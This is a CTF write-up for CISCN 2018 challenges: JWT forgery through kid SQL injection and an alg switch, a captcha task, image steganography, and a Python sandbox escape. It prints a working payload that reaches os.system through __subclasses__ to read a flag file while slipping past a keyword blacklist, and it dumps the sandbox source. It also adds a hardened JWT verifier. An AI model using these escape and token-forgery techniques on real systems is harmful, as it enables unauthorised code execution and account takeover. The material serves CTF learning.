All challenges: https://github.com/findneo/ctfgodown/tree/master/ciscn2018

WEB

easyweb

http://114.116.26.217/

I learned a bit about JSON Web Tokens, but didn't expect the challenge to be a guessing game. (This was probably just an unintended solution.)

Log in as user admin with an empty password.

ciscn{2a36b5f78a1d6a107212d82ee133c421}


A teammate in the group chat said the HMAC key is stored in the database and that kid is an injection point: a UNION query can control the lookup result, after which the signature can be forged.

From the start of the contest through trying to reproduce it afterwards, I kept getting stuck on alg being sha256. I assumed the key was used as a salt and tried salting by hand, which led nowhere. After reading up on it, HMAC can be thought of as a relatively sophisticated salting construction, so hand-rolling a salt is pointless, and JWT doesn't support plain sha256 anyway.

It turns out that changing sha256 to HS256 is all it takes. There are two possibilities: either the backend hardcodes the algorithm as HS256 and only the header says sha256, or the algorithm is chosen from the alg value and HS256 is used because that is what we sent.

Testing showed the backend doesn't even care whether alg is present at all... so it pays to stay flexible when approaching a challenge.

The kid value can be anything, as long as it is odd enough that the query returns no rows; the value from our UNION query is then used as the final key.
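As an added illustration (not code from the writeup or the challenge), this is how a verifier avoids the two weaknesses the solution relied on: it looks up the HMAC key by kid with a parameterised query, so kid cannot steer the lookup, and it pins alg to HS256 instead of trusting whatever the header claims. The key table, its column names and the secrets are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import sqlite3

# Constructed in-memory key store standing in for the challenge's key table;
# the table and column names are assumptions, not the original schema.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE jwt_keys (kid TEXT PRIMARY KEY, secret TEXT)")
db.execute("INSERT INTO jwt_keys VALUES ('k1', 'constructed-server-secret')")

def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_hs256(header, payload, secret):
    """Mint a token; used here only to build inputs for verify()."""
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def lookup_secret(kid):
    # kid is bound as a query parameter, never spliced into the SQL text,
    # so a crafted kid cannot redirect the lookup to an attacker-chosen secret.
    row = db.execute("SELECT secret FROM jwt_keys WHERE kid = ?", (kid,)).fetchone()
    return row[0] if row else None

def verify(token):
    """Return the payload dict for a valid token, None for anything else."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(b64url_decode(h64))
        sig = b64url_decode(s64)
    except (ValueError, UnicodeDecodeError):
        return None
    # Pin the algorithm: the header must say exactly HS256. A missing alg,
    # "sha256" or "none" is rejected rather than guessed at.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    secret = lookup_secret(str(header.get("kid", "")))
    if secret is None:  # unknown kid: no key, so fail closed
        return None
    expected = hmac.new(secret.encode(), (h64 + "." + p64).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(p64))
```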


References:

MISC

验证码 (Captcha)

This challenge is a captcha-breaking task: contestants must break the captcha within the given time to receive the flag. Log in with your team token.
Reference data: https://share.weiyun.com/6e055fc3402e86c7cbb5384f1a6b41b8

https://game.captcha.qq.com/hslj/html/hslj/

The challenge had some issues, so I played it by hand for a while.

ciscn{12qiftb1qj12mbzm1xmjd2iix2ibqz7i}


Later it was changed so that typing in the captcha gives the flag.


picture

Find the password in the picture.

Attachment download

binwalk -e extracts two files, 97E4 and 97E4.zlib; the latter is the zlib-compressed form of the former.

import zlib
# Python 2: confirm 97E4.zlib is just the zlib-compressed copy of 97E4
print zlib.decompress(open('97E4.zlib','rb').read())==open('97E4','rb').read()
# got True

The base64-decoded contents of 97E4, after a little processing, form an encrypted archive.

import base64
t=open('97E4','rb').read()
m=base64.b64decode(t).encode("hex")   # Python 2: raw bytes -> hex string
n=''
# swap the two bytes of every 16-bit word (byte-order swap)
for i in range(len(m)/4):
    n+=m[i*4+2:i*4+4]+m[i*4:i*4+2]
print n

The contents look roughly like this:


Comparing gives the password: integer division or modulo by zero


That yields an encoded string:


Decoding gives CISCN{C16E6F6E065DA0306E318D095C68BDC0}


run

Reference links:

payload:
# string concatenation keeps the substrings that input_filter bans (os, sys, cat)
# out of the submitted line; __getattribute__('func_globals') reaches the
# module globals of a built-in subclass's __init__ and from there linecache -> os
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
# ciscn{db87226edc7f9aff82a6b524053eef9e}


While at it, I dumped a few files.


cpython.py

from ctypes import pythonapi,POINTER,py_object

# _PyObject_GetDictPtr returns a pointer to an object's __dict__ slot, which
# gives writable access even to the dicts of built-in types such as `type`
_get_dict = pythonapi._PyObject_GetDictPtr
_get_dict.restype = POINTER(py_object)
_get_dict.argtypes = [py_object]

del pythonapi,POINTER,py_object

def get_dict(ob):
    return _get_dict(ob).contents.value

sandbox.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-04-09 23:30:58
# @Author : Xu (you@example.org)
# @Link : https://xuccc.github.io/
# @Version : $Id$

from sys import modules
from cpython import get_dict
from types import FunctionType

main = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__

def delete_type():
    type_dict = get_dict(type)
    del type_dict['__bases__']
    del type_dict['__subclasses__']

def delete_func_code():
    func_dict = get_dict(FunctionType)
    del func_dict['func_code']

def safe_import(__import__,whiteList):
    # replacement __import__ that only allows modules on the whitelist
    def importer(name,globals={},locals={},fromlist=[],level=-1):
        if name in whiteList:
            return __import__(name,globals,locals,fromlist,level)
        else:
            print "HAHA,[%s] has been banned~" % name
    return importer

class ReadOnly(dict):
    """docstring for ReadOnly"""
    def __delitem__(self,keys):
        raise ValueError(":(")
    def pop(self,key,default=None):
        raise ValueError(":(")
    def popitem(self):
        raise ValueError(":(")
    def setdefault(self,key,value):
        raise ValueError(":(")
    def __setitem__(self,key,value):
        raise ValueError(":(")
    def __setattr__(self, name, value):
        raise ValueError(":(")
    def update(self,dict,**kwargs):
        raise ValueError(":(")

def builtins_clear():
    # strip every builtin except the handful needed to run the REPL loop
    whiteList = "raw_input SyntaxError ValueError NameError Exception __import__".split(" ")
    for mod in __builtins__.__dict__.keys():
        if mod not in whiteList:
            del __builtins__.__dict__[mod]

def input_filter(string):
    # substring blacklist applied to the lowercased input line
    ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
    for i in ban:
        if i in string.lower():
            print "{} has been banned!".format(i)
            return ""
    return string

# delete_type();   # never called, so type.__bases__ / __subclasses__ stay reachable
del delete_type
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear


whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins

del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__

print """
 ____
|  _ \ _   _ _ __
| |_) | | | | '_ \
|  _ <| |_| | | | |
|_| \_\\__,_|_| |_|


Escape from the dark house built with python :)

Try to getshell then find the flag!

"""

while 1:
    inp = raw_input('>>>')
    cmd = input_filter(inp)
    try:
        exec cmd
    except NameError, e:
        print "wow something lose!We can\'t find it ! D:"
    except SyntaxError,e:
        print "Noob! Synax Wrong! :("
    except Exception,e:
        print "unknow error,try again :>"

/home/ctf/bin


Challenge backup

https://github.com/findneo/ctfgodown/tree/master/ciscn2018